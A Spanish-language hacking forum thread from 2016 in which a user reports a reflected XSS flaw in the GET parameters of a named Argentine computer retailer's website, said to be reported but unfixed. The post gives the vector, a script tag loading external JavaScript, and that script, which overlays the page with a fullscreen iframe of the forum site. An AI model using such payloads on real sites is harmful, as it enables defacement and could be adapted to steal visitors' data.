comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[XSS] www.aikencomputacion.com.ar

  • 4 Respuestas
  • 1452 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Nobody

  • *
  • Underc0der
  • Mensajes: 196
  • Actividad:
    0%
  • Reputación 4
  • Security as art.
    • Ver Perfil
    • Nobody Test Laboratory
  • Twitter: @n0bodysec
« en: Febrero 02, 2016, 07:43:08 pm »
¡Hola, muy buenas!

Estaba buscando para comprarme una GeForce nueva, cuando me topé con mi viejo amigo Aiken Computación (Argentina :P), y como todo amante de la informática y vulnerabilidades a nivel web, sentí la obligación de probar un XSS en una variable GET (jaja).

Tuve la idea de incluir un script JavaScript externo para no líarme bypasseando el addslashes de la web.

(P.D.: Es una "fullscreen" iframe).
[*] Imagen:
Citar

[*] URL: No tienes permisos para ver links. Registrate o Entra con tu cuenta
[*] Vector utilizado: <script src=https://nobodytl.github.io/codes/js/iframe.js></script>
[*] Variables vulnerables: Todos los GET de la web.
[*] Reportado: SI (no reparado).

En definitiva, el vector final sería: No tienes permisos para ver links. Registrate o Entra con tu cuenta

El código del JavaScript lo dejo aquí debajo (aunque también es visible desde el link del vector) para demostrar como funciona.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
document.body.innerHTML = "<iframe style='position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;' src=http://www.underc0de.org/></iframe>";
alert("Underc0de.org");

¡Saludos!
« Última modificación: Marzo 20, 2016, 02:33:27 pm por Nobody »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado MrR0bot

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Febrero 03, 2016, 11:10:04 am »
Hola,

La imagen que has subido esta caída, prueba a ponerla en otro host.

Lo de modificar, ¿como que no te deja? Deberías encontrar la opción de modificar a la altura de la cabecera de tu post.

Por otro lado, buen descubrimiento.
"Las organizaciones gastan millones de dólares en firewalls y dispositivos de seguridad, pero tiran el dinero porque ninguna de estas medidas cubre el eslabón más débil de la cadena de seguridad: la gente que usa y administra los ordenadores"
 -- Kevin Mitnick

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    1.67%
  • Reputación 15
    • Ver Perfil
« Respuesta #2 en: Febrero 05, 2016, 08:02:58 am »
Muy buen descubrimiento, espero seguir viendo aportes tuyos.

Verifica de nuevo si te permite editar el post.

Saludos.



Desconectado ro0tmag

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
  • No sabía que era imposible
    • Ver Perfil
« Respuesta #3 en: Febrero 05, 2016, 09:24:38 am »
 ;D ;D Excelente!! Vas a comprar algo y terminas buscando una vulnerabilidad! Esa es la actitud
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Nobody

  • *
  • Underc0der
  • Mensajes: 196
  • Actividad:
    0%
  • Reputación 4
  • Security as art.
    • Ver Perfil
    • Nobody Test Laboratory
  • Twitter: @n0bodysec
« Respuesta #4 en: Febrero 05, 2016, 09:29:28 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Hola,

La imagen que has subido esta caída, prueba a ponerla en otro host.

Lo de modificar, ¿como que no te deja? Deberías encontrar la opción de modificar a la altura de la cabecera de tu post.

Por otro lado, buen descubrimiento.
Gracias por avisar, voy a dejar de usar Google Drive como host jaja, imagen re subida.
¡Gracias!
(P.D.: Me daba error al modificar, una linda blank page :/ jaja).

No tienes permisos para ver links. Registrate o Entra con tu cuenta
Muy buen descubrimiento, espero seguir viendo aportes tuyos.

Verifica de nuevo si te permite editar el post.

Saludos.
Si, ya se solucionó :-) Gracias por repararlo :P
Gracias, seguriás viendo aportes míos :P jaja

No tienes permisos para ver links. Registrate o Entra con tu cuenta
;D ;D Excelente!! Vas a comprar algo y terminas buscando una vulnerabilidad! Esa es la actitud
Jaja, no se como llegué a esto (? xD
Jaja gracias, ¡saludos!
« Última modificación: Febrero 22, 2017, 02:12:16 am por rollth »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

 

¿Te gustó el post? COMPARTILO!